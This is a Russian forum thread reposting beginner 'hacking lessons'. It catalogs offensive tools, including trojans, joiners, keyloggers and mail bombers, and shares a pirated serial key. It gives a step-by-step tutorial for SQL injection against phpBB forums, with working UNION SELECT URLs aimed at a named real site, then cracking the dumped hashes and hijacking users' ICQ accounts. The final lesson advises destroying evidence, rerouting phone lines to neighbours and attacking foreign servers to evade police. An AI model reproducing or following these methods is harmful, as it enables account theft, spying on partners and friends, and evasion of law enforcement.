Добро пожаловать!

Другой Мир

Объявление

Добро пожаловать на форум drugojmir.forumbb.ru

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Другой Мир » ВСЁ ДЛЯ W@P/WEB-МАСТЕРА » Уроки хакерства


Уроки хакерства

Сообщений 1 страница 4 из 4

1

В этом уроке будут рассмотрены следующие две темы: введение и инструменты хакера.

Введение
Привет, читатель. Год назад я пришёл на ХЗ, и очень хотел стать хакером. Никто не мог мне обьяснить многие простые вещи, я видел много опытных, но стать на путь хакера мне помогли буквально единицы. И я могу их назвать: PinkPanther, DrWeb, R_a_ID_e_R. Я обучался сам, не надеясь ни на чью помощь, стараясь описывать свои познания в статьях для новичков. Так шло время, менялись поколения... Я не хочу усложнять жизнь ньюбов, я всегда к ним хорошо относился, и я считаю, что новички меют право знать. Тот, кто скажет, что я неправ, что мол "пусть сами разбираются, только так они вырастут", и прав и неправ. Да, упорные достигнут своей цели, но человек, которому это не надо, просто не будет читать эту статью. Тем, кто до сих пор мучает поисковики вопросами типа "как стать хакером" я решил посвятить цикл уроков, а может, и книгу. Ты пройдёшь путь от ламмера до хакера, изучишь технологии программирования, взлома и многое-многое другое. Проходи этот путь по моим урокам, и всё будет ОК. Это первый урок, посвящённый азам хакерства, он скорее завлекающий. Помни, всё это только игрушки, а настоящее хакерство пойдёт потом. А на этом этапе ты должен решить, нужно оно тебе, или нет. Постепенно мы изучим сетевые технологии, ты узнаешь, как устроен Интернет, что можно в нём найти интересного, что можно, а что нельзя. Добро пожаловать в наш мир!

Инструменты хакера
В этом разделе я опишу джентльменский набор хакера. Этими инструментами мы будем иногда пользоваться в дальнейшем.

- Брутфорс
- Сканнер портов
- Сканнер безопасности
- Джойнер
- Mail Bomber
- Bзлом паролей Windows
- Просмотр паролей
- Троян
- KeyLogger
- Скрыватель IP (прокси/сокс)
- Подмена HTTP-запросов

Начнём по порядку:

[Брутфорс]. Bruteforce (в переводе с английского "грубая сила") применяется для подбора паролей от e-mail и ftp-серверов. Существует много видов программ-брутфорсов, но их способности схожи. При использовании таких программ на dial-up соединениях, где скорость не превышает 56 Кбит/сек, подбор может длиться долго и нудно, при использовании же скоростного интернета (ADSL, оптоволокно, спутник, и т.д.) скорость подбора увеличивается, однако тогда сьедается немало траффика. Оптимальный вариант - подбор по словарю. Взломщик составляет текстовый документ из возможных паролей жертвы, программа подключается на заданный ей сервер и по очереди перебирает пароли из файла. Если производится подбор паролей к почтовому ящику, нужно указать брутфорсу сервер входящих сообщений жертвы, например, если мы ломаем мыло vasia@pupkin.ru , то чаще всего сервером будет pop.pupkin.ru. Если же мы ломаем не e-mail, а сайт pupkin.ru, то надо указать ftp-сервер, это будет ftppupkin.ru . Брутфорсы имеют ещё массу полезных настроек, например, если ты подсмотрел, что твой друг вводит пароль из 5 символов, и первый его символ L, то тебе надо использовать подбор по маске. Маска будет выглядеть так: L#### . Я привёл общее описание, а для более близкого знакомства советую скачать wwwHack отсюда.

[Сканнер портов]
Поскольку этот урок - введение, сетевыми технологиями я тебя буду мучить в другой раз, но это всё равно надо знать.
Сканнеры портов проверяют заданный диапазон IP-адресов на заданный открытый порт. Если порт открыт, этот IP добавляется в список.
Где это применяется? Создатели так называемых "троянов" иногда предусматривают сканнер портов в своих творениях. Дело в том, что сервер
трояна, попадая на машину, открывает в системе порт, по которому он получает команды клиента. Для тех, кто еще не догадался, обьясню: Зная,
какой порт открывает наш троян, мы "спрашиваем каждый компьютер диапазона", открыт ли этот порт, и если это так, значит на этой машине
сидит наш трой - можно смело коннектиться и управлять этим компьютером. Я рекомендую использовать Essentional Net Tools, так как это
хороший сканнер с дополнительным набором функций. Это не просто сканнер - имей ввиду. За время своего существования он стал
легендарным, и ещё не теряет своей актуальности. Он платный. Брат мой купил и дал мне серийник от версии 1.1:
Name: Jan Klaassen
S/N: 2957888021

[Сканнер безопасности]
В Интернете существует два типа страниц: статические(HTML) и динамические(PHP,ASP,CGI). Если расширение страницы htm, html, это означает, что сожержимое страницы не зависит от пользователя и всегда неизменное - "статическое". Динамические страницы обрабатывают данные, полученные от пользователя, грубо говоря, они умеют думать. Естественно, ни о каких дырах в html-страницах и речи быть не может, дыры бывают только в скриптах динамических страниц. Самые распространенные уязвимости - XSS. Их хорошо описал DrWeb в статье "XSS новичкам", поэтому их суть я обьяснять не буду. Для автоматизации поиска уязвимостей XSS (и не только) хакеры используют сканнеры безопасности. Я рекомендую XSpider.

[Джойнер] - (англ. Join - соединить, обьединить).
Джойнер - это программа, позволяющая обьединять несколько файлов один, с возможностью приклеивать к полученному файлу произвольную иконку. Таким образом, используя джойнер, хакер может склеить троянского коня с какой-либо полезной утилитой, и спихнуть это жертве. Та, в свою очередь, открывая файл, считает, что запускает свою прогу, хотя фактически их запускается две(три, четыре, и т.д.), просто троян себя не выдаёт. Минус такого подхода в том, что большинство джойнеров определяются антивирусами.

[mail bomber]
Этот тип программ предназначен для "бомбления" электронной почты, т.е. закидывания огромным числом писем. Mail-бомберы широко используются спаммерами. Лично я спаммером не являюсь, но использую Ganja Spammer для подмены адреса отправителя. Очень удобно при занятиях "фишингом". Что это такое - расскажу позже.

[Пароли Windows]
Я уважаю продукты компании InsidePro, и советую закачивать их отсюда. Это: PasswordsPro, MD5Inside, PWLInside, SAMInside. Предназначение программ уже заложено в их названии, но я расскажу о каждой в отдельности.
SAMinside - программа для взлома файла SAM. В Windows 2k/XP пароли пользователей хранятся в директории windowssystem32config, и называются соотв. SAM и SYSTEM, без расширения. Чтобы их скопировать для расшифровки, придётся юзать dos или альтернативную ОСь, как Windows PE. Так вот, пароли хранятся в зашифрованном виде, и чтобы их расшифровать, у тебя должны быть копии этих файлов. Надо забить их в SAMinside, поставить способ перебора, и ждать.
PWLinside - аналогично, только это для ныне мёртвых Windows 95/98, где пароли (в т.ч. на инет) хранятся в директории винды в файлах, имеющих расширение *.PWL.
MD5inside - расшифровывает MD5-хэш, используемый во многих системах авторизации. Расшифровав хэш, можно получить пароль. Кстати, в форумах IPB примерно такой хэш хранится в кукисах.
PasswordsPro - мощный инструмент для работы с паролями, имеет все функции MD5inside, генерация хэшей, также он может показывать пароли, скрытые за звёздочками, для этого надо включить соотв. режим и навести мышей на поле с паролем.

[Просмотр паролей]
Если тебе интересно знать, что друг пишет твоей невесте по e-mail, достаточно прити к нему домой и отправить варить кофе, а в это время достаём дискетку и запускаем прогу, показывающую все его пассы, от мыла в том числе. Магия? Нет! Всё дело в том, что для удобства, чтобы избавить тебя от кайфа каждый раз при авторизации на сайте, в аське и т.д. вводить пароль, браузеры/аськи/почтовики его запоминают. Вот за это их и наказывают). Существует множество программ, показывающих всевозможные сохранённые пароли. Чтобы посмотреть, что там насохранял IE и Outgluk Express, можно воспользоваться программой PSPV. Для TheBat - TheBatPasswordViewer, для ICQ/Trillian/Miranda etc. - Advanced Instant Messenger Password Recovery, сокращенно AIMPR.

[Троянская лошадь]
Вот и подобрались к самому интересному). Этот подвид зверей так называется потому что действует подобно знаменитому троянскому коню. Проникая в систему пользователя, он там осваивается и работает на хозяина. Что я имею ввиду? В отличие от вируса, троян безобиден, если ты не в сети. Он активизируется, когда его создатель посылает ему команды через LAN или Интернет, например, он может по команде отправить хозяину твои пароли, и ещё много чего интересного, также позволяет взломщику лазить по твоим файлам и реестру, вобщем суть ты понял, а возможности у них у всех разные. Самые популярные троянцы: ALB, NetBus, LamerDeath. Но только вот все они уже давно палятся. А мой собственный называется LamerHack, можете поискать на моем сайте vladuha, и не палится, но сейчас доступна ещё слабенькая бета-версия, кроме того непалимость компенсируется размером сервера.

[KeyLogger]
Кейлоггер - это по-русски "клавиатурный шпион". Он отлавливает все твои нажатия клавиш и записывает их в файл, после чего может отправить их своему создателю, либо сохранить на винт. Полезно ставить у подруги - он запишет всё, что кому она пишет по аське.

[Proxy]
Если ты занимаешься чем-то не совсем законным, то тебя вряд ли устроит то, что на взломанном тобой сервере останется твой IP-адрес, по которому тебя вычислить нефиг делать. И что в таком случае? Существует такая вещь, называемая прокси-сервером, или сокс-сервером. Я не буду вдаваться в тонкости и обьяснять тебе, чем они отличаются - на данном этапе тебе это неважно. Суть одна - заменяется твой IP-адрес на адрес proxy-сервера. Это ипользуется, когда есть какие-то ограничения на твой IP, например, обьем музыки для скачивания, либо ограниченное число попыток регистрации аськи. А для самого первого случая нужно использовать анонимные или элитные прокси. Их недостаток - непостоянность. Они меняются каждые n часов. Всегда свежий список проксей находится здесь. В качестве программы для использования proxy я советую A4proxy.

[Подмена HTTP-пакетов]
Это я тоже буду описывать более подробно в будущих уроках. Вся информация в Сети передвётся т.н. "пакетами". Подобно пакетам секретной информации на войне, HTTP-пакеты имеют начинку и надпись: кому/куда и т.д. , с той лишь разницей, что ЭТА информация особо секретной не считается, но вызывает интерес. В заголовке пакета находится информация о браузере, откуда мы пришли, и каким скриптам какие данные передаются. Как ты понял, речь пойдёт о подмене этих данных. Возникает вопрос: "А зачем?" . А затем. Рассмотрим лучше на примере. У нас в Днепропетровске очень популярный интернет-провайдер "Алькар Телепорт". Он содержит несколько сайтов с интересными ресурсами, которые доступны только его пользователям. При заходе с других провов, они посылают нафиг. А как же эти сайты проверяют, откуда я пришел? По IP. Если, допустим, IP вида 212.15.x.x , то доступ разрешен. А если заменить referer(откуда я появился) на адрес самого сервера, то, скорее всего, он не будет нам ничего запрещать. Используется программа InetCrack, качаем её отсюда.

Добываем себе красивую аську и не только
[ Хакерство для новичков ]

Не так много способов найти себе красивую аську, но они есть, проще всего конечно купить, не такие они дорогие и проблем с покупкой по большому счету не возникнет. Можно заняться похищением чужого номера с помощью брутфорса, но это требует времени и определенных затрат, каких? Я думаю писать про это нет смысла - это и так понятно, а если не понятно можно почитать статьи об этом, которые легко найти на бескрайних просторах. Есть возможность получить уины с паролями при помощи XSS, но это тема другой статьи и найти инфу по XSS, проще, чем репа приготовленная путем нагревания воды до температуры кипения. Кстати на сайте ICQ.com тоже была возможность использования XSS, я где то про это читал, а если я читал, значит это кто то писал, а если кто то писал, значит я уже про это писать не буду. Ну, и наконец СИ. Системная инженерия требует от человека определенных личных качеств, которые даны не всем. Есть и другие способы получения красивых уинов, но я остановлюсь на способе, при котором можно получить не только аську, но много полезных вещей. Вобщем...

Ломаем форум.

Для начала, нам нужно читать... Да, читать багтреки, искать описания уязвимостей и эксплойты, или возможность эту уязвимость использовать. Я остановлюсь на популярном форуме phpBB, а конкретно на его моде downloads, а уязвимость использую - SQL инъекция, по своему опыту, я заметил что уязвимы версии до пятой, но может я ошибаюсь.
Дело в том, что многие юзвери для простоты, по глупости, или для того чтобы не загружать свои драгоценные мозги ака память, используют на все сервисы один и тот же пароль, для почты, для форумов, для всевозможных регистраций и ... конечно же для Аси. Побежал менять пароль? Подожди дочитай, я думаю, за это время ничего страшного не случится, а вот потом обязательно поменяй, только не стоит менять пароль asdf на пароль qwerty - толку мало, уж если выбирать пароль, то от души и с русским упорством, предлагаю что-то типа:
G4ep6HkS_Dd7_FopRnk40_9_kL4
Шутка конечно, можно и покороче. Ладно, пойдем дальше, а дальше собственно нам и надо найти уязвимый форум. Для этого открываем Гугл и пишем в строке поиска:
inurl:"downloads.php" by phpBB
Гугл сделал свое дело, но гуглу еще рано уходить. Открываем первую ссылку в которой используется скрипт downloads.php и что мы видим, внизу незаметно красуются надписи CrackerTracker, Cback, powered by Orion, Angriffe abgewehrt (на немецких сайтах, их будет ой как много) и т.д. Смысл этих слов такой, что, мол не стоит тут запросы всякие вводить подозрительные, толку не будет, а вот айпишник твой, мы администратору по-любому вышлем. Вобщем это, так сказать, защита. делать там нам действительно нечего, открываем Гугл, идем по следующей ссылке...Ага, вроде цтракеров нет, и тут уж можно запрос свой попробывать.
Пробуем: http://site/path/downloads.php?cat=-1 union select 0,user_icq,user_password,0,0,0,0,0,0 from phpbb_users where user_icq0/*
И что же мы видим? А ничего полезного, бага заделана, так что мы опять открываем Гугл и переходим по следующей ссылке и у нас открывается http://www.divx.it/downloads.php
Пробуем: http://www.divx.it/downloads.php?cat=-1 union select 0,user_icq,user_password,0,0,0,0,0,0 from phpbb_users where user_icq0/*
И что же мы видим? Кучу ошибок, УРА СРАБОТАЛО!!!
Идем вниз страницы и видим симпатичную табличку, а в ней, о да, слева номера уинов, справа мд5 хеши паролей, ими мы и займемся, а точнее их расшифровкой.
Открываем MS Excel, возвращаемся к нашей страничке и выделяем все данные из этой таблички, копируем в буфер, открываем Excel, нажимаем вставить, и удаляем ненужные столбцы, а ненужные это все кроме столбца с уинами и столбца с паролями(хешами). Далее делаем так, в первом столбце у нас должны быть номера(уины), второй столбец будет полностью заполнен знаком двоеточия( : ) , третий столбец это мд5 хеши, и четвертый заполняем тремя знаками двоеточия( ::: ). Должно получиться так:
|100666| : | 2dca2ec76085db1b628086269699cef3| ::: |
Да, сразу скажу, юзверь - зверь ленивый и иногда не хочет вводить номер аськи, а пишет просто:123 или 555 и т.п., советую сразу такие строчки удалить, что бы их не проверять, ибо только время на них потратится.
Далее сохраняем екселевскую таблицу как текст(MS-Dos) ну и получается у нас файл, например 1.txt. Закрываем! Excel, открываем этот файл в блокноте. Файл у нас сыроват, как йогурт , а именно: не все строки нам одинаково полезны. Мы выделяем нужный текст, текст в котором есть уины и хеши до того места где в тексте идут пустые строчки( в которых только двоеточия, это все Excel гад!) и нажимаем на кнопку копировать, Дале нажимаем кнопку выделить все, и нажимаем вставить. Но это еще не все, в каждой строчке у нас появились знаки табуляции между уином, двоеточием, хешем и тремя двоеточиями, ну с этим тоже просто, выделяем табуляцию (она у нас в виде длинного пробела) идем в начало файла ставим курсор на первую позицию(для верности) открываем окошко найти, в верхнее поле вставляем скопированный нами ранее знак табуляции и нажимаем кнопку заменить все. Все строчки файла должны быть вида:
100666:2dca2ec76085db1b628086269699cef3:::
т.е без пробелов. Убедились, что это так, сохраняем файл.
Открываем программу перебора паролей. Я открываю PasswordPro крякнутый, потому что в некрякнутом есть ограничения, можно использовать только 20 паролей за один раз.
Открываем вкладку файл нажимаем кнопку открыть, и загружаем файл с паролями (1.txt) Кстати, надеюсь, что у тебя пассвордпро настроен и ты умеешь им пользоваться. Ну да ладно все пошагово: открыли файл, Выбираем тип хеша MD5, ОК, нажимаем кнопку настроить , далее Атака по словарям, там выбираем файл со словарем (надеюсь он у тебя есть), ОК, во вкладке сервис отмечаем пункт простая атака по словарям и нажимаем плей, идем курить, приходим смотрим что получилось. Ага, какие то хеши он уже расшифровал, далее опять нажимаем кнопку настроить и строчку Атака полным перебором, ставим галочку возле надписи [0...9] т.е. все цифры, минимальную длину ставим 1, максимальную 8 (т.к. асечные пароли в большинстве своем восьмизначные, а остальные нам не нужны), ОК, во вкладке сервис выбираем атаку полным перебором, нажимаем плей, идем курить. Так... Расшифровалось довольно много хешей, но далеко не все, я бы даже сказал меньше половины, опять кнопку настроить ставим галочку напротив [a...z] причем галочка возле 0...9 остается, ОК, плей, идем спать, перебор не закончился но уже надоел, нажимаем паузу. (Жирная точка) Хотя нет, если мы хотим что бы подобрались все пароли, нажимаем кнопку настройки, ставим все галочки, ОК, плей, идем спать, идем в институт, идем в армию, идем работать, выходим на пенсию и смотрим, ага, ВСЕ!!! Вот оно стариковское счастье!!!
Приступаем к последнему этапу...
Открываем свой пейджер (у меня qip) его и буду описывать. Значит, открываем qip, открываем окно пассвордпро, на строке с подобранным паролем нажимаем правой кнопкой мыши, копировать, Имя пользователя (у нас это уин), открываем окошко qip, ищем во вкладке строчку сменить учетную запись, в поле ICQ# кликаем правой кнопкой, вставить, открываем окно пассвордпро, на строке с подобранным паролем и нашим уином нажимаем правой кнопкой мыши, копировать, пароль (не хеш!), открываем окошко qip, в поле пароль вставляем скопированный пароль, пробуем подключится и ..... окно - неверный уин/пароль, неудача, не все пользователи пользуются одним паролем на все сервисы, продвинутые (как мы с тобой) пользуются прогами для хранения паролей, держат все пароли в голове, или на бумажках приклеиных к холодильнику, в связи с этим отпадает необходимость пользоваться одним паролем, который мы сейчас похитим. Ну так вот, русские не сдаются и мы пробуем следующий пароль который у нас расшифровался, и спустя какое то время нас ждет успех, да мы не смогли найти пароли к номерам типа 100100 и т.п. (хотя чем черт не шутит) но то что мы нашли гораздо компактнее и красивее нежели тот уин который мы получили при регистрации.

Остается только добавить, что таким методом можно получить и пароль администратора форума, а также учетные записи юзверей, если вместо user_icq, во втором поле мы напишем username, а после where напишем user_id=2/* (в форумах phpBB id=1 - Anonymus, а id=2 - администратор) то получим хеш администратора (ты уже наметил себе, что теперь грозит форуму) если мы уберем where вообще а /* поставим сразу после phpbb_users, то у нас будет список логинов и хешей всех пользователей форума, а если вместо username написать user_email, то получим список почтовых ящиков. Да и еще если ты крут и тебе не нужны 8 и 9 -значные аськи, ты можешь после where написать user_icq>=100000 and user_icq100000/* что я и советую сделать, чтобы сразу отбрасывались варианты с 3,4,5 (да - 5, тут тебе не на что рассчитывать, хотя дело твое) В общем пробуй, набирайся опыта.

Спасибо за прочтение, Scipio
Карфаген должен быть разрушен...

Основы хакерства. Урок 2
[ Хакерство для новичков ]

Основы

В этом уроке будут рассмотрены следующие темы:

-Психология хакера. Идеальный хакер

-Ответственность

-Путь хакера

-Атрибуты хакера

Психология хакера

У многих слово "хакер" ассоциируется с эдаким ботаником, день и ночь взламывающим банки и переводящим себе кучу денежек,
неустанно бесперерывно сносящим сотни серверов одним ударом без причины. Хочу тебе сказать, что эта мысль в корне
неправильная. В этом уроке мы пока еще не будем вскрывать банки (ну разве что банку пива:)), мы поговорим о том, кто такие
хакеры, что они делают и какими мотивами руководствуются.

Согласно определению, хакер - человек, увлекающийся компьютерами, и испытывающий желание знать о них всё. Запомни, что просто
так ничего не происходит, и У любого взлома есть цель, мотив, взломщик и ОТВЕТСТВЕННОСТЬ.
При взломе хакером движет элементарное любопытство, желание проникнуть внутрь, найти уязвимость. Если ты со мной не согласен,
тебе просто нет смысла читать дальше.
Ламмер - это не тот, кто не знает, а тот, кто не стремится.
Хакер - это вселенский энтузиаст. Давайте будем энтузиастами. Для начала ты должен уметь использовать поисковики. В Инете
говорят, google - твой лучший друг. Если у тебя есть какой-либо вопрос, не спеши с ним на форум, поищи уже готовые ответы,
ведь наверняка ты не первый, кто его задает. Если ты научишься владеть поисковиком, то дальнейшее изучение не составит
проблем. На 90% твоих вопросов ответы есть в Интернете. Конечно, кое-чему научу тебя я, но я же не старик }{отт@бь)ч, я
специализируюсь на конкретных направлениях и языках, которые мне интересны. Так сложилось, что я изучаю Delphi, а не C++ или
VB, хотя в будущем планирую изучить и их. Я веду к тому, что ты сам выбираешь то, что тебе больше интересно, и я не
всезнающий оракул. Рано или поздно придет время самостоятельно принимать решения, находить выходы из ситуаций. Именно этому
я тебя учу - ты должен обладать творческим мышлением, уметь адаптироваться к новым условиям. Программирование - это прежде
всего творчество, ведь написание или хотя бы мысленное составление алгоритма - процесс творческий, а уже написание
программного кода по готовому алгогритму зависит только от языка, и труда не составит. Но всем этим "творчеством" мы будем
заниматься все равно в рамках Delphi). Это что касается программирования.

Так уж исторически повелось, что базовый язык для машин, в т.ч. компьютеров - английский. Если ты не обладаешь хотя бы
базовыми знаниями английского, тебе придется туго. В этом случае можешь уже идти записываться на соответствующие курсы.

И конечно, ты должен обучиться быстрому набору. ИМХО, Соло 6 - это все фигня. Как и слепой набор, фыва-олдж - это придет со
временем. Лично я нехило обучился с помощью программки speed-o-meter. Сейчас ее у меня уже нет, посему линк не дам, поищи в
Сети. Ты должен быстро и правильно набрать то, что содержится в поле. Офигенная вещь!


Что же за ответственность? Я думаю, догадаться несложно. Существуют статьи УК, в которых описаны наказания за
компьютерные преступления. Приведу их:

Кардер.

Статья 159. Мошенничество

Статья 165. Причинение имущественного ущерба
путем обмана или злоупотребления доверием

Статья 183. Незаконное получение и
разглашение сведений, составляющих
коммерческую или банковскую тайну

Статья
187. Изготовление или сбыт поддельных
кредитных либо расчетных карт и иных
платежных документов

Статья 272. Неправомерный доступ к
компьютерной информации

Статья 273. Создание, использование и
распространение вредоносных программ для
ЭВМ
Фрикер.
Статьи КоАП РСФСР

Статья 137. Изготовление и использование
радиопередающих устройств без разрешения

Статья 138. Нарушение правил приобретения,
установки, строительства и эксплуатации
радиоэлектронных средств

Статья 139. Нарушение правил охраны линий и
сооружений связи
Статьи УК РФ
Статья 137. Нарушение неприкосновенности
частной жизни

Статья 138. Нарушение тайны переписки,
телефонных переговоров, почтовых,
телеграфных или иных сообщений

Статья 183. Незаконное получение и
разглашение сведений, составляющих
коммерческую или банковскую тайну
Хакер
Статья 272. Неправомерный доступ к
компьютерной информации

Статья 273. Создание, использование и
распространение вредоносных программ для
ЭВМ
Не буду приводить формулировок и санкций
этих статей, их без труда найдете сами. Все
выше перечисленное не говорит, что вас будут
судить лишь по этим статьям, все зависит от
обстоятельств и ваших действий, есть еще
статьи 30-я "Приготовление и покушение на
преступление" (доказать очень трудно), 146-я
и 147-я авторские и патентные права (инфа,
которую вы только что скачали, могла
охраняться законом), и еще много не Бог
весть чего. Кроме того, существуют
различные комментарии, но еще не факт, что
судья будет их читать. Доказать сам факт
преступления трудно. Например если вы
подобрали пароль вошли на сервер при этом
не была нарушена работа средств защиты (Ст.
272 модификация, блокирование) пошарились,
почитали, оставили все как есть и ушли, даже
если вас обнаружили, состав преступления
отсутствует, но если в этот момент на сервер
не мог войти владелец пароля (блокирование),
то состав уже есть. Сканирование портов
вообще не попадает ни под одну статью,
представьте вы ходите по дому и ищете
открытую дверь, это не значит, что если вы ее
найдете то зайдете туда. Таких примеров
очень и очень много, надо лишь их найти. Я не
хочу сказать, что типа все тип-топ, живите
спокойно никто вас не тронет, на этом сайте
уже было высказано мнение, что ловят:
а) Лохов

б) Жадин Даже будь ты трижды крут, ты можешь круто
лохануться, ну а если хочешь получать
выгоду от своей хакерской деятельности (см.
пункт b), то тогда начнут накапливаться
вещественные улики и свидетельства против
тебя. Пример из жизни: ребята занималась
взломом аккаунтов частных организаций, все
было хорошо аккаунтов было много их трафик
не превышал 20% от общего их никто не палил.
Потом они решили продавать доступ другим,
причем сажали по несколько человек на
аккаунт (см. пункт b), те в свою очередь
начинали качать mp3 и все такое. В результате
трафик в некоторых фирмах подскочил на
200-300%. В итоге когда к одному челу который
юзал халявный инет пришла милиция, он сразу
назвал имя, адрес, телефон и номер
троллейбуса на котором надо ехать к челу
который продал ему доступ (см. пункт а).
Теперь об отмазках, их достаточно много. Под
психа косить не стоит - принудительное
лечение в больнице тюремного типа, санитары
изверги, неизвестные лекарства
психотропного действия, выйдете точно
психом. Стучать тоже не имеет смысла если вы
при этом не предотвратите преступления,
кроме того нет никаких гарантий, что вам
это зачтется. Одной из самых мощнейших
отмазок является ст.13 ч.1 "Граждане
Российской Федерации, совершившие
преступление на территории иностранного
государства, не подлежат выдаче этому
государству", вспомните где и когда
арестовали Левина, ломайте иностранные
серваки и все будет в порядке. Еще есть ст. 14
"Понятие преступления" ч.2 "Не является
преступлением действие (бездействие), хотя
формально и содержащее признаки какого-либо
деяния, предусмотренного настоящим
Кодексом, но в силу малозначительности не
представляющее общественной опасности, то
есть не причинившее вреда и не создавшее
угрозы причинения вреда личности, обществу
или государству", хотя в нашей стране могут
посадить за ведро картошки, не знаю, может ли
это реально помочь. Можно сослаться на
неосторожность т.е. "знал что может
случиться что-то нехорошее, но не думал, что
до этого дойдет" - легкомыслие, и "не знал
что может что-то случиться, хотя вполне
должен был" - небрежность. Еще есть ст. 28 "Невинность
преступления" не знал и не предвидел или
знал, но не мог предотвратить. Смягчающие
обстоятельства: первое преступление,
несовершеннолетие, явка с повинной,
возмещение материального ущерба (может не
прокатить в предыдущем примере ребятам
закатили такой счет, что они решили, что
лучше "самый гуманный суд в мире").
Последние два обстоятельства самые
действенные получите три четвертых от
максимального срока или размера наказания.
Большую роль играет умысел, если не имел
место злой умысел, то наказание будет
гораздо мягче.
Если вас несколько человек, то не стоит
сильно шифроваться "... явки, пароли, чужие
дачи..." могут сильно навредить вам,
особенно если ваша конечная цель получение
прибыли, преступление расценивается "...совершенным
организованной группой, если оно совершено
устойчивой группой лиц, заранее
объединившихся для совершения одного или
нескольких преступлений" ст35 ч.3. Разница
между "группой лиц" и "организованной
группой" по разным статьям плюс-минус 3 - 4
года, не считая штрафов. Вообще всеми "денежными"
делами лучше заниматься одному, проще
отмазаться, а еще лучше вообще ими не
заниматься если нет особой нужды или
хорошего адвоката. Если же вы все же
решитесь создать "организованную группу",
чего я вам настоятельно не советую делать,
то читайте на ночь не детективные книжки, а
уголовный кодекс и книги о тюремной жизни.
Тем, кто занимается хаком в одиночку.
Не храните ничего такого на диске, в том
числе учебники по хаку и просто сохраненные
страницы соответствующего содержания, не
говоря уже о софте - могут быть приобщены к
делу по 30 статье подготовка к преступлению,
не стоит концентрироваться на скоростных
способах убивания винта. Не стоит надеяться
на то, что в вашу металлическую дверь
постучат и скажут "Откройте, милиция!"
если так произойдет, можете быть спокойны -
это не к вам. Вот возможные методы
проникновения в вашу квартиру (взято из
лекции Московского военного института "Тактика
обыска и выемки"):

"Заход на плечах", когда сотрудники группы захвата входят с заходящим или выходящим человеком.

При выходе подозреваемого (то есть вас) из квартиры

Проникновение в помещение сотрудников группы захвата с помощью специальных средств через окна, балконные двери и т.д.

Этот вариант применяется в случаях, когда
входные двери укреплены и подходы к
помещению контролируются подозреваемыми.

В лекции эти способы описаны в качестве
примера проникновения в помещения
оборудованные бронированными дверьми с
подозреваемыми в торговле наркотиками и
вполне могут быть применены к вам. Причем
это сопровождается выключением
электричества и, возможно, телефона, также
осуществляется контроль за окнами
помещения. Может прийти "почтальон" или "работник
ГТС". Таким образом времени на то, чтобы
уничтожить информацию будет мало, если оно
вообще будет. Ни я ни мои друзья не
сталкивались с управлением Р, но мои друзья
сталкивались с ОБЭП и налоговой полицией,
когда они заходили они точно знали, что им
нужно и где что лежит. Следует полагать, что
с Р будет также. Храните все на дискетах на
уничтожение одной дискеты уходит 5-10 секунд,
перегибаете пополам до характерного хруста
вытаскиваете диск мнете. Много инфы - юзайте
зип ломается за... не знаю не ломал, или
скидывайте все на матрицы портится тоже
очень быстро шкуркой, зажигалкой, на худой
конец просто ручками перегибаете пополам
до характерного хруста и не забудьте иметь
под рукой длинную иглу чтобы открыть CD-ROM,
надеюсь не надо объяснять как ей
пользоваться. Не храните носители дома если
они не нужны на данный момент, если они
нужны держите их под рукой, чтобы оперативно
уничтожить, не прячьте ничего в аудио-видео
технику, она будет соответствующем образом
проверяться. Если занимаетесь своей
деятельностью эпизодически не ленитесь
перекидывать в распределительной коробке (РК),
свои телефонные пары на соседские, при этом
оставив следы подключения на своих парах,
мол вы тоже жертва. РК порой бывают недоступны, большой замок на щитке закрытая
коридорная дверь, любопытные соседи, замок
будет в любом случае закрытый или не
закрытый, но будет достать к нему достать
ключ проблем не доставит (только не
спрашивайте у соседей). Кроме того, если к
вам придут, провода проверят в первую
очередь - все ли там в порядке. Лучше, если
позволяют средства купите радиотелефон,
схему подключения модема к трубе несложно
найти в инете, подключаетесь в другом доме
пусть ищут, найдут базу от телефона пусть
оставят себе - свобода дороже. Хотя они
могут оставить все как есть и попробуют
запеленговать, где вы со своей трубой сидите,
по этому труба не выход из всех бед, ищите
свой метод. Способов установки базы
описывать не буду, потому как таким образом
как я скажу вы ее уже не установите. Кроме РК
существуют распределительные шкафы на
несколько сот пар, стоящие на улице, но
толку
от них мало, сомнительно что вы найдете там
свою пару, места для установки базы там
маловато да и питание неоткуда взять.
Можете просто ради интереса посмотреть как
все устроено, большинство из них ни каких
замков не имеет, только хитро продуманные
запоры под шестигранный ключ на М10 или
больше точно не помню (можно попробовать
болтом) на мой взгляд ни чего интересного
там нет, куча проводов и все. Напоследок
хотелось бы сказать не делайте ни чего
такого, что впоследствии осложнит вам жизнь.
Помни, готовясь к чему-нибудь серьезному
используй всю информацию полученную в
общедоступных источниках лишь как пример, а
не как руководство к действию.

0

2

По-моему всё понятно. Это вырезано из электронного журнала "Хакер". От себя я могу сказать, что лучше всего хранить конфиденциальные данные
на CD в запароленном архиве с очень сложным паролем и измененным расширением. И носить этот диск с собой, чтобы в случае чего сразу его >-
К чему я веду? Существует документ, получивший название "Конституция Хакера", почитай его.
Там изложены принципы обучения идеального хакера, запомни - это твой кодекс. Это не значит, что ты должен по нему жить, но старайся придерживаться для себя этих правил, и ты достигнешь своей
цели. Как там сказано, "это не необходимость, но простая вежливость".

О чертах хакера. Что помогает нам при взломе? Упорство, опыт, логика и соответствующее мышление.



Путь хакера

Здесь и сейчас, с этого момента, начинается твой путь в хакеры. Где-то в Интернете я видел интересное высказывание: лучший админ - это хакер, и наоборот - лучший хакер - злой админ.
Отчасти это правда. Подобно тому, как хороший боец должен хорошо владеть оружием, хакер должен хорошо владеть компьютером. Они знают по нескольку языков программирования, разбираются в операционных
системах, знают, как устроен компьютер и могут собрать и разобрать его за 45 секунд). Чтобы успешно находить уязвимости в
скриптах, ты должен знать, по какому принципу они работают, а чтобы это понять, надо знать язык, на котором они написаны.
Не обязательно знать прям всё, но что-либо альтернативное из каждой группы языков ты должен выбрать. Вот основные языки,
которыми пользуются хакеры. Из каждой группы вибери один-два языка:

Ассемблер

Delphi | C++ | Visual Basic

HTML, XML, WML

PHP | ASP | JSP | Perl

SQL и кoмпания

Не обязательно учить всё сразу, чтоб не говорил, что я тебя запугиваю. Жирным выделены обязательные языки. По возможности
найди как можно больше учебников для дальнейшего изучения.

Ассемблер используется для взлома shareware-программ, для создания кряков и кейгенов. Дальше. HTML, PHP, ASP, Perl, JavaScript, VBS, JSP, и многие другие обьединяют в одну группу - это
"веб-языки". При помощи них создаются веб-сайты, например HackZona написана на PHP. HTML - это не язык программирования. Его
